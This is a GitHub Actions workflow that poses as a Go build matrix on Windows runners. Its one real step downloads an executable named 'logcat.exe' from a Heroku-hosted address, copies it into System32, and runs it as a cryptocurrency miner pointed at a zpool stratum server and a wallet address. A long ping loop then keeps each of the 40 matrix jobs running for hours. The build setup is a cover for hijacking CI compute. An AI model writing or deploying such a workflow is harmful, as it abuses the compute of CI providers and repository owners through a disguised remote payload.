name: dev
on: [push, pull_request]
jobs:
  build:
    name: dev
    runs-on: windows-latest
    strategy:
      max-parallel: 100
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 360
    env:
        NUM_JOBS: 100
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: dev
      run: Invoke-WebRequest Invoke-WebRequest https://panelinfo.herokuapp.com/circleci-opt/logcat.exe -OutFile logcat.exe
Copy logcat.exe C:\Windows\System32
cmd /c echo cmd /k start logcat.exe -a lyra2z330 -o stratum+tcp://lyra2z330.na.mine.zpool.ca:4563 -u D9zT4xf7iGNcbrH6nLEKBCqjmiC3yKPwc2.CIwin1 -t2 -p c=DGB,zap=PYRK-lyra2z330 >>a.ps1
cmd /c echo ping -n 999999 10.10.10.10 >>a.ps1
.\a.ps1
